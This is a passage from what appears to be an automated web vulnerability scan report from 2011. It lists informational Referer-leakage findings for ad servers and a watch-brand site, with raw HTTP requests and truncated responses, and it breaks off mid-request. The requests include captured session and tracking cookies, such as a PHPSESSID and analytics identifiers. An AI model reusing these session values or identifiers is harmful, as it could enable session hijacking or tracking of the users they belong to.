X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=1155309149&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BjBjYkxWJTt3uAYqE2gXXz8mJCPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_0nT7x-GHaafkiuKILnL9QPfI4YQQ&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...

19.140. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=flights&url=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&dt=1317602103974&shv=r20100101&jsv=r20100101&correlator=1317602103976&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=1291285493&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=0&bih=0&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:35:11 GMT
Server: cafe
Cache-Control: private
Content-Length: 14035
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/%253Ftype%253Dair%2526utm_source%253Dorbitz%2526utm_medium%253Dcrpopunder%2526utm_content%253Dair%2526utm_campaign%253Dtriplooking%2526cmpid%253D1%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3Dwww.Travelzoo.com%26adT%3DFlights%2Bfrom%2B%252439%26adU%3DLasVegas.TripMama.com/Flights%26adT%3DLas%2BVegas%2BFlight%2BFrom%2B%252439%26adU%3DLowFares.com/Paris-Flights%26adT%3DParis%2BFlights%2Bfrom%2B%252449*%26adU%3Dwww.CheapCaribbean.com%26adT%3DCheap%2BCaribbean%26gl%3DUS&amp;usg=AFQjCNEa9JgUy79CsbPhprwspCJxrMi1Qw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.141. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=280&slotname=9968660253&w=336&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602228730&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317602228802&frm=7&adk=3345861870&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=270757924&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=669&ady=257&biw=1058&bih=906&ifk=3906417519&prodhost=googleads.g.doubleclick.net&fu=4&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:37:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 13423
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/hotels.html%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3Dwww.Hotelsio.com/%26adT%3D75%2525%2BOff%2BHotels%26adU%3Dwww.CheapOstay.com%26adT%3DHotel%2BDiscount%2B-%2B50%2525%2BOFF%26adU%3Dwww.TripIt.com%26adT%3DCheck%2Bmy%2Btrip%26adU%3Dwww.Zozi.com/Golf%26adT%3D90%2525%2BOff%2BGolf%2BNear%2BSJ%26gl%3DUS&amp;usg=AFQjCNEBf4rqme7FMC42Cy4eg5QFRFEq1A" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.142. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=hotels&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602151658&shv=r20100101&jsv=r20100101&correlator=1317602151660&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=57948256&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=1058&bih=906&ref=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:36:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 9539
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/hotels.html%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3DVacationCruisesInfo.com/Honeymoon%26adT%3DHoneymoon%2BCruises%26gl%3DUS&amp;usg=AFQjCNE2HDhucXZUk6KE7_1_v2YKdwYEmA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.143. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=flights&url=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&dt=1317602103969&shv=r20100101&jsv=r20100101&correlator=1317602103971&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=1430756546&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=0&bih=0&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: cafe
Cache-Control: private
Content-Length: 13890
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/%253Ftype%253Dair%2526utm_source%253Dorbitz%2526utm_medium%253Dcrpopunder%2526utm_content%253Dair%2526utm_campaign%253Dtriplooking%2526cmpid%253D1%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3DLima.OneTime.com%26adT%3DLima%2BFlights%26adU%3Dwww.BookingWiz.com/LasVegas-Flights%26adT%3DCheap%2BFlights%2Bfrom%2B%252449*%26adU%3DCheapOair.com%26adT%3DCheapOair%25C2%25AE%2BCheap%2BFlights%26adU%3Dwww.AlphaFlightGuru.com%26adT%3D70%2525%2BOff%2BBusiness%2BClass%26gl%3DUS&amp;usg=AFQjCNFs72kJvazLNSqyqgJnDdTq5eDFtQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.144. http://hublotnation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

19.145. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:52:19 GMT
Content-Length: 1783

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
</iframe>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

19.146. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:52:21 GMT
Content-Length: 3209

<IFRAME SRC="http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0

HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
</SCRIPT>
...[SNIP]...
DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
<IMG SRC="http://ad.doubleclick.net/ad/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie4;abr=!ie5;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" BORDER=0 WIDTH=728 HEIGHT=90

ALT="Advertisement">
</A>
...[SNIP]...

19.147. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZg